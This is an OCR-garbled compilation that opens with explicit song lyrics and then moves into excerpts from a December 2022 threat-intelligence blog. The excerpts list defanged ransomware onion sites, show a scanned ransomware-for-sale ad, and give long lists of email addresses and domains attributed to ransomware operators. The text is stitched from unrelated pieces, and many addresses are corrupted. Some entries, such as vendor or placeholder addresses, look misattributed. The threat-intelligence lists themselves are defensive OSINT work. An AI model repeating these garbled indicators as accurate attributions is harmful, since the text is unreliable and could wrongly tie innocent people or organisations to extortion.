"Suckin’ on my titties like you wanted me 

Callin’ me, all the time, like Blondie 

Check out my Chrissie behind 

It’s fine all of the time 

Like Sex on the Beaches 

What else is in the Teaches of Peaches? Huh? What? 
Suckin’ on my titties like you wanted me 


Callin’ me, all the time, like Blondie 
26367 


Check out my Chrissie behind 

It’s fine all of the time 

What else is in the Teaches of Peaches? 
Like Sex on the Beaches, uh, what? 

Huh? Right, what? Uh 

Huh? What? Right, uh 

Huh? What? Right, uh 

Huh? What? Right, uh 

S-I-S, |UD, stay in school ’cause it’s the best 
IUD, S-I-S, stay in school ’cause it’s the best 
IUD, S-I-S, stay in school ’cause it’s the best 
IUD, S-I-S, stay in school ’cause it’s the best 
Suckin’ on my titties like you wanted me 
Callin’ me, all the time, like Blondie 

Check out my Chrissie behind 

It’s fine all of the time 

Like Sex on the Beaches 

What else is in the Teaches of Peaches? Huh? What? 
Fuck the pain away, fuck the pain away 
Fuck the pain away, fuck the pain away 
Fuck the pain away, fuck the pain away 
Fuck the pain away, fuck the pain away 
Fuck the pain away, fuck the pain away 
Fuck the pain away, fuck the pain away 
Fuck the pain away, fuck the pain away 
Fuck the pain away, fuck the pain away 
Huh? What? Right, uh 

Huh? What? Right, uh 

What else in the Teaches of Peaches? 

Like Sex on the Beaches, what? Right, uh 
Fuck the pain away, fuck the pain away 
Fuck the pain away, fuck the pain away 
Fuck the pain away, fuck the pain away 


Fuck the pain away, fuck the pain away" 
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Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vVZ2x1/AVVXsEhVUt29TuCOQ1L80q4Pt YBqDhZNtNm9xLBcruoknXxjvVPm1 


yqc4cLZxQAV9OL3QGqU1HynQzsoHq3IgW7p68_tuHJWqijV5FjWVleH 


18.12.4 Exposing a Compilation of Known Ransomware Group’s Dark Web Onion Web 
Sites - An OSINT Analysis - Part Three (2022-12-08 17:44) 


[1] 


@ borne Pegs - PRE FROZE x 


e- ¢ > Eon 


nu * 


FILEFROZR —_ Updates 


FILE FROZR is a great security tool that encrypts most of your files in several minutes. All that you earn 
yours, you pay once for a license, all further inspections are free. 


Coded from scratch 8 Affordable and ready to use No need of vps &@ 


"Out of the box" 4 


Uniierited rete 


Dear blog readers, 
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I’ve decided to share with everyone part three of my "Exposing a Compilation of Known Ran- 
somware Group’s Dark Web Onion Web Sites - An OSINT Analysis" compilation of known ran- 
somware themed Dark Web onion web sites. 


Check out [2]part one and [3]part two here. 


Sample list of known and currently active Dark Web onion web sites known to have been 
involved in ransomware themed campaigns: 


hxxp://omegalock5zxwbhswbisc4202q2i54vdulyvtqqbudqousisjgc7j7yd.onion 
hxxp://abrahamm32umasogagqojib3ey2w2nwoafffrgugq43tsyke4s3fz3w4yd.onion 
hxxp://37rckgo66iydpvgpwve7b2el5q2zhjw4tv4imyewufnpx4lhkekxkoqd.onion 
hxxp://alpbhvmmm27o03abo3r2ml|mjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion 
hxxp://3kp6j22pz3zkv76yutctosa6djpj4yib2icvdqxucdaxxedumhgicpad.onion 
hxxp://anewset3pcya3xvk73hj7yunuamutxxsm5sohkdi32blhmq|I55tvgqad.onion 
hxxp://mhdehvkomeabau/7gsetnsrhkfign4jgnx3wajth5yb5h6kvzbd72wiqd.oni on 
hxxp://avosqxh72b5ia23d|5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion 
hxxp://ng4zyac4ukl4tykmidbzgdlvaboqeqsemkp4t35bzvjeve6zm2Iqcjid.onion 
hxxp://bianlianlocSan4kgnay30pdemgcryg2kpfcbgczopmm3dnbz3uaunad.onion 
hxxp://bl4cktorpms2gybrcyt52aakcxt6yn37byb65uama5cimhifcscnqkid.onion 
hxxp://f5uzduboq4fa2xkjloprmctk7 ve3dm46ff7aniis66cbekakvksxgeqd.onion 
hxxp://joeg2dct2zhku6c2vwnpxtm2psnjo2xnqvvpoiiwr5hxnc6wrp3uhnad.onion 
hxxp://blackmax7su6mbwtcyo3xwtpfxpm356jjqrs34y4crcytpw7mifuedyd.onion 
hxxp://bonacifryrxr4siz6ptvokuihdzmjzpveruklxumflz5thmkgauty2qd.onion 
hxxp://rwiajgajdr4kzInrj5zwebbukpcbrjhupjmk6gufxv6tg7myx34iocad.onion 
hxxp://santat7kpllt6iyvgbr7q4amdv6édzrh6paatvyrzl7ry3zm72zigf4ad.onion 
hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr/7eaxw3y6ncz3ad.onion 
hxxp://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si/76icnqd.onion 
hxxp://7k4yyskpz3rxq5nyokf6ztbpywzbjtdfanweup3skctcxopmt7tq7eid.onion 
hxxp://7ukmkdtyxdkdivtjad5 7klqnd3kdsmq6tp45rrsxqnu76zzv3jvitiqd.onion 
hxxp://darksidc3iux462n6yunevoag52ntvwp6wulaz3zirkmh4cnz6hhj7id.onion 
hxxp://woqjumaahi662ka26jzxyx7fznbp4kg3bsjar4b52tqkxgm2pylcjlad.onion 
hxxp://npoo4dosa3x4ognfxpqcrjwnsigvslm7kv6hvmhh2yqczaxy3j6qnwad.onion 
hxxp://xqkz2rmrqkeqf6sjbrb47jfwngqxcd402zvaxxzrpbh2piknms37rw2ad.onion 
hxxp://leaksv7sroztl377bbohzl42i3ddlfsxopcb6355zc7olzigedm5agad.onio n 
hxxp://ransomocmou6mnbquqz44ewosbkjk305qjsl30rawojexfook2j7esad.onion 
hxxp://griefcameifmv4hfr3auozmovz5yi6m3h3dwbuqw /baomfxoxz4qteid.onion 
hxxp://ws3dh6av6é6sjbxxkjpw5ao3wqzmtejnkzheswm4dz5rrwvular7xvkqd.on ion 
hxxp://ft4zr2jziqoyob7yg4fcpwyt3 7hox3ajajqnfkdvbfrkjioyunmaqnpad.onion 
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hxxp://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7/7ez7iqy6wc34gd2nekazyd.onion 
hxxp://matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd.onion 
hxxp://kf6x3mjeqljqxjznaw65jixin7dpcunfxbbakwuitizytcpzn4iy5bad.onion 
hxxp://lockbitapt6vx5 7t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion 
hxxp://lockbit7z2jwcskxpbokpemdxmltipntwlkmidcll2girobu7ykg46eyd.onion 
hxxp://wm6mbuzipviusuc42kcggzkdpbhuv45sn7olyamy6mcqqked3waslibqd.onion 
hxxp://lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion 
hxxp://4qbxi3i20qmyzxsjg4fwe4aly3xkped52gq5orp6efpkeskvchge27id.onion 
hxxp://rovuetuneohce3ouxjlbxtimyyxokb4btncxjbo44fbgxqy 7tskinwad.onion 
hxxp://jvdamsif53dqjycuozlaye2s47p7xij4x6hzwzwhzrqmv36gkyzohhqd.onion 
hxxp://qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion 
hxxp://midasbkic5eyfox4dhnijkzc7v7e4hpmsb2qgux7diqbpna4up4rtdad.onion 
hxxp://mobikwikoonux37wauz6oqymshuvebj5u763rutlogc2fbo203ugcazid.onion 
hxxp://gg5ryfgogainisskdvh4y373ap3b2mxafcibeh2lvq5x7fx76ygcosad.onion 
hxxp://vbfqgeh5nugm6r2u2qvghsdxm3fotf5wbxb5ltv6vw7 7vus5frdpuaiid.onion 
hxxp://pay2key2zkg 7arp3kv3cuugdaqwuesifnbofun4j6yjdw5ry7zw2asid.onion 
hxxp://mbrlkbtq5jonaqkurjwmxftytyn2ethqvbxfu4rgjbkkknndqwaeébyd.onion 
hxxp://pysa2bitc5ldeyfak4seeruqymas4sj5wt5qkcq7aoyg4h2acqieywad.oni on 
hxxp://ozsxj4hwxub7gi0347ac7tyqqozvfioty37skqilzo20qfs4cw2mgtyd.onion 
hxxp://quantum445bh3gzuyilxdzs5xdepf3b7|kcupswvkryf3n7hgzpxebid.onion 
hxxp://wobpitin7 7vdsdiswr43duntv6eqw4rvphedutpaxycjdie6gg3binad.onion 
hxxp://sushInty2j7qdzy64qnvyb6ajkwg 7resd3p6agc2widnawodtcedgjid.onion 
hxxp://rgleaktxuey67yrgspmhvtnrqtgogur35Iwdrup4d3igtbm3pupc4lyd.onion 
hxxp://wavbeudogz6byhnardd2|kp2jafims3j 7tj6k6qnywchn2csngvtffqd.onion 
hxxp://rnsm777cdsjrsdibs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onion 
hxxp://xw7au5pnwtl6lozbsudkmyd32n6gnqdngitidppybudan3x3pjgpmpid.onion 
hxxp://blog2hkbm6gogpv2b3uytzi3bj5d5zmc4asbybumjkhughas355janyd.onion 
hxxp://relichzqwemjnu4veilml6prgyedj6phs 7de3udhicug53z37klxm6qd.onion 
hxxp://blogxxu75w63ujqarv476otld7cyjkq4yoswzt4ijadkjwvg3vrvd5yd.onion 
hxxp://gamol6n6p2p4c3ad7gxmx3ur7wwdwlywebo2azv3vv5qlmjmole2zbyd.onion 
hxxp://royal4ezp7xrbakkus30o0fjw6gszrohpodmdnfbe5e4w30g5sm7vb3qd.onion 
hxxp://hl66646wtlp2naoqnhattngigjp5palgqmbwixepcjyq5i534acgqyad.onion 
hxxp://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion 
hxxp://3slz4povugieoi3tw7sblxoowxhbzxeju42 7cffsst5fo2tizepwatid.onion 
hxxp://x2miyuiwpib2imjr5ykyjngdu7v6vprkkhjltrk4qafymtawey4qzwid.onion 
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hxxp://vsociethok6sbprvevl4dlwbaqrzyhxcxaqpvcqt5belwvsuxaxsutyad.onion 
hxxp://xingnewj6m4qytljhfwemngm/7r7rogrindbq7wrfeepejgxc3bwci7qd.onio n 
hxxp://jukswsxbh3jsxuddvidrjdvwuohtsy4kxg2axbppiyclomt2qciyfoad.onion 
hxxp://stniiomyjliimcgkvdszvgen3eaaoz55hreqqx607 7yvmpwt7gkliffqd.onion 
hxxp://sbc2zv2qnz5vubwtx3aobfpkeao6él4igjegm3xx7tk5suqhjkp5jxtqd.on ion 
hxxp://3f7nxkjway3d223j27lyad7v5cgmyaifesycvmwq/7i7cbs23lb6llryd.onion 
hxxp://dfpc7yvle5kxmgg6sbcp5ytggy30e0b676bjgwcwhyr2pwcrmbvoilqd.onion 
hxxp://ranionv3j207wrn3um6de33eccbchhg32mkgnnoi72enkpp7jc25h3ad.onion 
hxxp://nalr2uqsave7y2r235am5jsfiklffpA5h4jcSnztu3rzvmhklwt5j6kid.onion 
hxxp://fl3xpz5bmgzxy4fmebhgsbycgnz24uo0sp3u4g330iIn627qq3gyw37ad.onion 
hxxp://gcbejm2rcjftouqbxuhimj5oroouqcuxb2my4raxqa/efkz5bd5464id.onion 
hxxp://aby6efzmp7jzbwgidgqc6ghxi2vwpo6d7eaood5xuoxutrfofsmzcjqd.onion 
hxxp://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd.onion 
hxxp://avosqxh72b5ia23d|5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion 
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Stay tuned! 
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18.12.5 Introducing my "Collaborative Maltego Hacker Database Graph" Project - 
Free Access Available (2022-12-11 15:13) 


[1] 


Mr. Zero 


Dear blog readers, 


Do you have Maltego? If so you can quickly grab a free copy of it and join my collaborative 
"[2]Maltego Hacker Database Project" initiative where | intend to work on and issue daily up- 
dates in the form of personally identifiable cyber attribution details on a huge number of cyber 
attackers where the ultimate goal would be improve everyone's situational awareness in the 
cyber attribution field. 


How to obtain access to the project? 


Drop me a line at dancho.danchev@hush.com to request access and I'll shortly send you the 
necessary accounting data for the collaborative Maltego hackers database graph. 


Sample screenshots include: 


[3] 
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otobym .cn 
abicoym .cn 
nepsoym .cn 
byzfalo .cn 
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dahokxu .cn 
lylbaov .cn 


cusryw .cn 
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Stay tuned! 
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18.12.6 My Android Mobile Application - An Analysis (2022-12-11 21:13) 
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Dear blog readers, 
Happy holidays! 


Are you an avid reader of this blog and do you enjoy going through my research on a daily 
basis and have you been doing so throughout the past decade? 


Grab a copy of my free [2]Android application which you can find on Google Play and grab all 
the latest updates as soon as | publish something here on Medium Substack Twitter Flickr or 
YouTube. 


Sample screenshots include: 
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Stay tuned! 
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18.12.7 Profiling a Currently Active High-Profile Cybercriminals Portfolio of 
Ransomware-Themed Extortion Email Addresses - Part Six (2022-12-12 18:01) 
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Dear blog readers, 


I’ve decided to share with everyone my most recent compilation in the fight against ran- 
somware globally which is basically a compilation of Known ransomware-themed personal 
email address accounts known to have been involved in the actual ransomware recruitment 
and funds solicitation process. 


Sample list of known ransomware-themed email address accounts known to have been in- 
volved in various ransomware themed campaigns include: 


goldwave@india.com 
dokulus@tutanota.com 
3mvlyd3@gmail.com 
wowaanne@mail.ru 
Brilliancebk@protonmail.com 
James2020m@aol.com 


legalrestore@tutanota.com 
26393 


nCyberwars@protonmail.com 
petrus34@p-security.|i 
BM-2cTzz6rwtd8d7qd1wVegH6sZ44GbNPV8Li@bitmessage.ch 
Supportdecrypt@firemail.cc 
koxic@cock.li 
pentaxyz777@protonmail.com 
hacker _decryption@protonmail.ch 
securityagent@techmail.info 
myqjsOl@gmail.com 
mvplocksvc@yahoo.com 
alexbanan@tuta.io 
filesrecoveren@onionmail.org 
remotePChelper@tutanota.com 
iknowyouandiseeyou@protonmail.ch 
recoverydata99@protonmail.com 
nviastnou.hlavou@mailfence.com 
helpmanager@iran.ir 
Decipher@keemail.me 
nmydataback@cock.li 

Bossi tosi@protonmail.com 
Silver@decryption.biz 
FreeWizard9@protonmail.com 
karapooz@cock.li 
20dfs@keemail.me 
decrypt123@sent.com 
cryptocash@aol.com 
Dor.file@bk.ru 
coronav2020@cock.li 
truongquocvi@gmail.com 
cstddetnkvcmknI@gmail.com 
test.jpg.id-1235240425 help@decryptservice.info 
phobos help@xmpp.jp 
IWUUUUUUUUUbasq@mail.ru 
gxa34rttf50gqlagnes@gmail.com 
nsoft.russian@secmail.pro 

26394 


Marina.jeffeaux91@klachurch.org 
AperywsQaroci@o2.pl 
kcwjspen@gmail.com 
gomer@horsefucker.org 
f1220@tuta.io 
seed@firemail.cc 
decryptiondata@india.com 
igbosshorse@xmpp.jp 
0405000330@inbox.ru 
encrypt2020@outlook.com 
Blitzkriegoc@protonmail.com 
dj.elton@hotmail.co.uk 
nm67p7a@mailfence.com 
asmo49@asmodeus.us 
getdataback@fros.cc 
Tuko.Salamanca@mailfence.com 
05250lock@protonmail.com 
Rtsghost@outlook.com 
westlan@protonmail.ch 
petropasevich@aol.com 
silena.berillo@gmail.com 
berr@keemail.me 
nfileig@gtechie.com 
element444@keemail.me 
assistant@bitmessage.ch 
lalabitch2017@yandex.com 
gyeceeidia7y@gmx.com 
decryptioncompany@inbox.ru 
barracudahelper@exploit.im 
devilguy@sigaint.org 
nzdarovachel@gmx.at 
Lemordewn@gmail.com 
Apple.pass@mail.com 
RecoveryDatal@cock.li 


geniusid@protonmail.ch 


26395 


money21@onionmail.org 
cryptget@tutanota.com 
flower.harris@protonmail.com 
Trojan.Win64.estemaniii@airmail.cc 
recoryfile@tutanota.com 
t310ea89b4347@protonmail.com 
China.Helper@india.com 
hallome@tutanota.com 
numbermskpiter@dnmx.org 
contatoaac@vpn.tg 
gherardobaxter@aol.com 
phrasitliter1981@protonmail.com 
europay@india.com 
gorentos@bitmessage.ch 
technopc@protonmail.com 
Decryptallfiles3@india.com 
projectb@onionmail.org 

nCobra _Locker@protonmail.com 
tikitakbum@rambler.ru 
bitcoin666@cock.|i 

lord bomani@keemail.me 
montserrat501@protonmail.com 
BTCBREWERY@protonmail.com 
hallome@firemail.cc 
kirova.ls@orangedv.tmweb.ru 
g8k4w@keemail.me 
spaxl425@protonmail.com 
Mk.goro@aol.com 

your last chance _help@elude.in 
supercrypt@mailer9.com 
qatarworldcuplivedraw@gmail.com 
Beulah34@1490.com 
rikeistner@gmail.com 
marjut56@cock.li 
recoverydata@india.com 
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supportd@tfwno.gf 
petrov441@protonmail.com 
fmhir@protonmail.com 
viastnou.hlavou@mailfence.com 
nreverso@cock.li 
mydatarecovery@india.com 
Beauchamp.tammie@mail.ru 
hitsbtc@tuta.io 

sill@tuta.io 
torchwood@riseup.net 
black.world@tuta.io 


theonewhoknocks6969@mailinator.com 


nrecoverymydata@protonmail.com 
nBioawards@tutanota.com 
flydragon@mailfence.com 
realunlocker@india.com 
tomascry@protonmail.com 
lasvegasincel@cock.li 
berserk666@tutanota.com 
conactme@fake-box.com 
Salesrestoresoftware@gmail.com 
filedownload2020@protonmail.com 
nown@ruggedinbox.com 
decrfile@tutanota.com 
andres11@cock.li 

ex _parvis@aol.com 
helpsend369@gmail.com 

Repair data@cryptmail.com 
Deccoder431@protonmail.com 
info@russianvip.io 
decode77@sfletter.com 
irmagetstein@india.com 
Filegorillal388@gmx.de 
mr.dec@tutanota.com 


nRobSmithMba@protonmail.com 


26397 


pain@onefinedstay.com 
teammarcyl10@cock.li 
61fle8055af3f6a672959e6b0493a2@gmail.com 
loggitore1984@tuta.io 
costestu@cock.|i 
zitenmax@rambler.ru 

help@ausi.com 
Lizardbkup@protonmail.com 
tom.anderson@india.com 
ncrab1917@protonmail.com 
mailnitrom@tutanota.com 
kolobocheg@aol.com 
Bioawards@tutanota.com 
ngorentos2@firemail.cc 
audrey.b@aol.com 
nExtel@msgden.net 
kamikizu@keemail.me 
Recuperadados@protonmail.com 
comodosec@yandex.com 
ncrypto7892@protonmail.com 
TimisoaraHackerfeam@protonmail.com 
cagel@gmx.us 
DecrypterSupport@protonmail.com 
manager@time2mail.ch 
RECOVERUNKNOWN@protonmail.com 
Ipe-cve@usa.com 

fuck4u@cock.li 
decode77777@gmail.com 
UnluckyWare@torbox3uiot6wchz.onion 
barracuda@airmail.cc 
netcrash@msgsafe.io 
deposithere@e-mail.ph 
rocosmon@cock.|i 
padredelicato@secmail.pro 
info@borontok.uk 
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decoderhelp@cock.li 
Freedom29@Tutanota.com 
dou876sh@mail.ee 
Unlockdata@criptext.com 
blower@firemail.cc 
vashmail@protonmail.com 
freshkart@420blaze. it 
nBillyl11@4302.com 
Jchan@india.com 
yagababushka@yahoo.com 
backspace@riseup.net 
geneve020@protonmail.com 
yourmom@yahoo.com 
helpyouhelpyou@cock.li 
vote2024forjb@protonniail.com 
vankosa@secmail.pro 
ms.heisenberg@aol.com 
neftet@tutanota.com 
recfiles@protonmail.com 
Gocrypt@aol.com 
hildaseriesnetflix125@tutanota.com 
Help@decryptservice.info 
nJohnPennegZZ@aol.com 
decryption@india.com 
toolsI990m@gmail.com 
suplO@post.com 

Diablo diablo2@aol.com 
ncrypto7892@gmx.de 
Encryptc4@elude.in 
djranarony4@gmail.com 
gorkmork@tutanota.de 
n0301192293@protonmail.com 
Alex.vilasov@aol.com 
fonix@mailfence.com 


Sos@anointernet.com 


26399 


Ninja _gaiver@aol.com 
doctorSune@protonmail.com 
Helpme@freespeechmail.org 
crypto7892@protonmail.com 
nhelpmanager@firemail.cc 
waiting@india.com 
ScOrpio@cock.li 
ops2@mailc.net 
dogeremembersss@protonmail.ch 
abat2019@yahoo.com 

_ _murzik@jabber.mipt.ru 
nEmpty003@protonmail.com 
monster666@tuta.io 
goldmind@tuta.io 

byaki buki@aol.com 
fileisafe@tuta.io 
EMAIL@protonmail.com 
loggitorel1984@mailchuck.com 
nLindaHunter474@gmail.com 
amigo a@india.com 
Decryptmyfiles@qq.com 
fixprotectvvv@protonmail.com 
rebushelper@exploit.im 
johnsonwhate@protonmail.com 
brbrcodes@gmail.com 
DatarestOre@aol.com 
decodeodveta@protonmail.com 
mark _white@mail.ua 
Suppteam03@india.com 
crannbest@foxmail.com 
Jackie7@asia.com 
restorel9@cock.li 
Savefiles@india.com 
btcdecoding@foxmail.com 


numlock@2riseup.net 
26400 


ncrab1917@gmx.de 
jOra@protonmail.com 
u043aocode@gmail.com 
decoder@cock.li 
locked@vistomail.com 
phomen@airmail.cc 
jduy3jd87dhs@grr.la 


myphoto.jpg.nefartanulo@protonmail.com 


Decrpt@tutanota.com 
andrey.taranov@protonmail.com 
rescuerr@protonmail.com 
Trojan.Win64.AiDcrypt@tutanota.com 
greatideacompany@gmail.com 
Cde@onionmail.info 
SharkO1@msgden.com 
ferrari@msgsafe.io 
Cyberwars@protonmail.com 
rahidproject@cock.li 
supportdecryption@cock.|i 
delafuente1945@outlook.com 
Light Yagami@tuta.io 
developer.110@tutanota.com 
coding 434@tutanota.com 
raypas@goat.si 
dr.crypt@aol.com 
ncrab7765@protonmail.com 
bannedlands@msgsafe.io 

china _jm@protonmail.ch 
crypt64@mail.ru 
ursa2277@gmx.com 
m4xroothackerteam@protonmail.com 
frankhans@tuta.io 
decryptorsoon301@aol.com 
contato.arquivoszip@email.tg 
AlanRed@criptext.com 


26401 


universe11@bigmir.net 
nfilein@yandex.com 
darkwaiderr@tutanota.com 
repairmyfile@tormail.org 
Worldcry@cock.li 
t_tasty@aol.com 
loggitore1984@protonmail.com 
Corpseworm@protonmail.com 
FridaFarko@yahoo.com 
lathelp16@gmail.com 
azrdecryptorbuy@firemail.cc 
helpshadow@india.com 
belgorod8712kozos@airmail.cc 
cobainOransom@cock.li 
tlalpidas1978@aol.com 
phobos helper@xmpp.jp 
im.online@aol.com 
dec.service@protonmail.com 
Admin@adsoleware.com 
Gerentoshelp@firemail.cc 
email _info@cryptedfiles.biz 
File-help@india.com 
you@domain.com 
rdphack@onionmail.org 
decrypt@india.com 
stopfilesrestore@india.com 
Meldonii@india.com 
merosa@firemail.cc 
happyness@keemail.me 
support911@cock.li 
lolitahelp@cock.|i 
filesO00001@gmail.com 
johnsmith987654@tutanota.com 
dcyptfils@protonmail.ch 
dexp@cock.li 

26402 


mynewprotection .net 
my-newprotection .net 
my-officeguard .com 


my-officeguard .net 


myprotectedsystem .com 
myprotected-system .com 
my-protectedzone .net 
myprotectionshield .com 
myprotectionzone .com 
my-protectionzone .com 
my-protectionzone .net 
myprotection-zone .net 
my-saerchsecure .com 
my-safetyprotection .com 
my-systemprotection .net 
mysystemsafety .com 
my-systemscan .com 
my-systemscanner .com 
mysystemsecurity .com 


new-scanandprotect .com 


2643 


blackhat@iname.com 
ctrlalt@cock.li 
BatHelp@india.com 
scryptx@meta.ua 
Files2021@tutanota.com 
mail@rapid2019.com 
AiDcrypt@tutanota.com 
nBeulah34@1490.com 

Support wc@bitmessage.ch 
Decisivekey@tutanota.com 
wyna@nyu.edu 
batary5588@india.com 
sumpterzoila@aol.com 
hemant.frnz@gmail.com 

jerry glanville data@aol.com 
aes-ni@tuta.io 
FilesRecoverEN@Protonmail.com 
lyieg9eB@secmail.pro 
nmerosa@india.com 
DecryptMyData@mailfence.com 
Sosca@foxmail.com 
Ixhlp@protonmail.com 
Trojan.Win32.help@decrypt-files.info 
managerhelper@airmail.cc 
ampkcz@onionmail.org 
WannaRenemal@goat.si 
Gregoryluton021021@gmail.com 
lion7872@gmx.de 
quiddoss@protonmail.com 

Help _you@india.com 
nefartanulo@protonmail.com 
WOWSMith123456@encripted.net 
Darknes@420blaze.it 
sendr@tutanota.com 


FilesRecoverFR@Gmail.com 


26403 


decrypt.guarantee@aol.com 
youneedmail@protonmail.com 
kfrvokr@protonmail.ch 
MildredRLewis@teleworm.us 
themail@cock.|i 
kiaracript@gmail.com 
decryptionwhy@india.com 
goodjob24@foxmail.co 
nullcipher@cock.li 
brelox777@gmail.com 
help73@protonmail.com 
3542516480@qq.com 
decryptfiles19@cock.li 
biggsurprise@tutanota.com 
onion33544@india.com 
helpdatarestore@firemail.cc 
ihurricane@sigaint.org 
pipikaki@onionmail.org 
rebushelp@airmail.cc 
Usdatadecrypt@gmail.com 
crazykillwe123@outlook.com 
softs98@protonmail.com 
nkrupalupium@india.com 
TucoSalamanca@elude.in 
Funnybtc@airmail.cc 
DIGITALKEY@163.com 
maxicrypt@cock.li 
encfilesos@aol.com 
helplovx@excite.co.jp 
lanran-decrypter@list.ru 
Zizz@tutanota.de 
ks20296@email.vccs.edu 
Merd@tutanota.com 
decrypt.my.files@gmail.com 
meowcorp@msgsafe.io 
26404 


garrymagic@tutanota.com 
ransom.izi.crypt@gmail.com 
Recoverybat@protonmail.com 
newrecoveryrobot@pm.me 
aid.keepcalm@protonmail.com 
jakie.nunes@tutanota.com 
hildalolilovesyou@memeware.net 
recovery94@cock.li 
Cho.dambler@yandex.com 
popstop@foxmail.com 
nAskHelp@india.com 
desktopmain228@india.com 
Redshitline@india.com 
Tara72@1753.com 
Gerkaman@aol.com 
nblower@fireman.cc 
n3twOrm@tuta.io 
contact@casinomtgox.com 
SayanWalsworth96@protonmail.com 
brovsky@airmail.cc 
Mrcrypting@airmail.cc 
skgrhk2018me@tutanota.com 
gOdd@criptext.com 
decode00001@gmail.com 
unlock rabbit@pm.me 
artemy75@cock.|i 

nhands _q647t@pudxe.com 
support@bestyourmail.ch 
keypassdecrypt@india.com 
jacdecr@tuta.io 
pecunia0318@tutanota.com 
universe1@protonmail.ch 
B32588601@163.com 
daves.smith@aol.co 


1lss33ggur@scryptmail.com 


26405 


decr@cock.li 
info@cryptedfiles. biz 
pain@cock.lu 
farhani.ma98@gmail.com 
nnaviteam@aol.com 
swordofsakura@india.com 
Decoder _master@aol.com 
alexwind46@protonmail.com 
workencryptincfolder@india.com 
pabpabtab@tuta.io 
Trojan.Win64.Merosa@india.com 
ufflaitunes decrypt@protonmail.com 
burgeer@protonmail.ch 
u201cSaveYou49@9399.com 
kirova.|@mutualizm.ru 
nAileen65@9033.com 
flyingship@mail2tor.com 
nExte2@protonmail.com 
getacrypt@tuta.io 
nmosteros@firemail.cc 
JinMaglaya@protonmail.com 
recover85@protonmail.com 
ndatarestore@iran.ir 
notopen@countermail.co 
Trojan.Win64.Bitcharity@protonmail.com.com 
n0x69x@protonmail.com 
incantofiles@bitmessage.ch 
langolier@airmail.cc 
torrenttracker@india.com 
nfilel@keemail.me 
ouuohk@eclipso.eu 
Blammo@cock.|i 
fud@lycos.com 
myOday@aol.com 
help@cairihi.com 

26406 


help havaneza@cryptolab.net 
youhaveonechance@420blaze. it 
HydaHelp1@tutanota.com 
icq-is-firefox20@ctemplar.com 
blackgoldI23@protonmail.com 
debora2019@airmail.cc 
grand@horsefucker.org 
decryptor171@mail2tor.com 
FilesHelp@tutanota.com 
BatHelp@protonmail.com 
Panzergen552@gmx.de 
eiklot@hi2.in 
criptoman@mailfence.com 
carcinoma24@aol.com 

ms _13@aol.com 
thorntitinil979@danwin1210.me 
ndecoder-help@protonmail.com 
alphareserve@tuta.io 
flowerboard@torguard.tg 
Opencode@india.com 
systems@tutanota.com 
notnepo@cock.lu 
nnomoreletters@protonmail.ch 
fun63s@protonmail.com 
Grapn206@india.com 
bsprjl020@protonmail.com 
databack2@airmail.cc 
knoocknoo@cock.li 
rekoh4th@secmail.pro 
GetMyPass@qq.com 
ndatarecovery@airmail.cc 
decrypt25@protonmail.com 
roterbro@cock.li 
server.recover@mail.ru 


recovery.company@protonmail.com 


26407 


enter software@india.com 
Stevenseagal@airmail.cc 
BM-2cUmM1HG5NFf9fYMhPzLhjoBdxXqde26iBm2@bitmessage.ch 
4lok3r@tutanota.com 
phomen@cock.li 
Mailrepa.lotos@aol.com 
crypto.support@aol.com 
metan19@mail2tor.com 
Vengisto@india.co 
astra2eneca@aol.com 
fileisafe@protonmail.com 
xaodecrypt@airmail.cc 
Blacklist@cock.li 
nsuplO@oath.com 
auinfol6@gmail.com 
nguifullchartill1970@protonmail.com 
axitrun2@tutanota.com 
gluttonBD@protonmail.com 
cryptomavens@protonmail.com 
decoder-help@protonmail.com 
itsupport831@reddithub.com 
panda7499@protonmail.com 
crypt32@jabber.ua 
mailnitrom@protonmail.ch 
ransomriggs@qq.com 
newneo1312@protonmail.com 
nCitrteam@aol.com 
hlpp@protonmail.ch 
Tizer77234@protonmail.com 
johnsonwhate@tutanota.com 
tara _fox5@aol.com 
infodeptl999@yandex.com 
mars _dec@outlook.com 

file name.doc.workencryptincfolder@india.com 
cryptghOst@protonmail.com 
26408 


decodedecode@tutanota.com 
decryptbox@airmail.cc 
tfastrecovery@airmail.cc 
egalytyy@protonmail.com 
beryl.mclennan@tutanota.de 
alpha2018a@aol.com 
Stevensons@tuta.io 
cryptbit2.0@protonmail.com 
randal _inman@aol.com 
GuardBTC@cock.|i 
decrypt01.cq@protonmail.com 
badhach2@aol.com 
factfullOLO03@airmail.cc 
elitebot@msgden.net 
nJamesBaker78@tutanota.com 
nowayout@sigaint.org 
safeanonym14@sigaint.org 


filein@yandex.com 


BM-2cTAPjtTkqiW2twtykGm5mtocFAz7g5FZc@bitmessage.ch 


yuzhou13@tutanota.com 
259461356@qq.com 


restoring sup@india.com 


telegramfirefox2029@protonmail.com 


unlOck@keemail.me 
ninja777@cock.li 
helpshadow@firemail.cc 
samanta@scryptmail.com 
nyO0000@protonmail.com 
nBackuppc@dr.com 
Ncrypt@cock.li 
branden4505@airmail.cc 
decryptiondata@bitmessage.ch 
grethen@tuta.io 
decryptor@cock.li 
schusterboss@dnmx.org 


26409 


decryptor666@420blaze. it 
security@qnap.com 

phobos _helper@exploit.im 
felix@countermail.com 
jsmithl974@mail.fr 
decrypt0077@gmail.com 
blackbyte1@onionmail.org 
hnx911@yahoo.com 
euphoria-help@elude.in 
servicedigilogos@protonmail.com 
Makedonskiy@gmx.com 
foxnitro@tutanota.com 
helper@tfwno.gf 
leltitbedecrypteddzi@gmail.com 
Nowayout@protonmail.com 
Ramachandra7@india.com 
UnluckyWare@mail2tor.com 
Glenna52@2606.com 
retrnyoufiles@tutanota.com 
MarzocchiZadok95@mail.com 
nmr.yoba@aol.com 
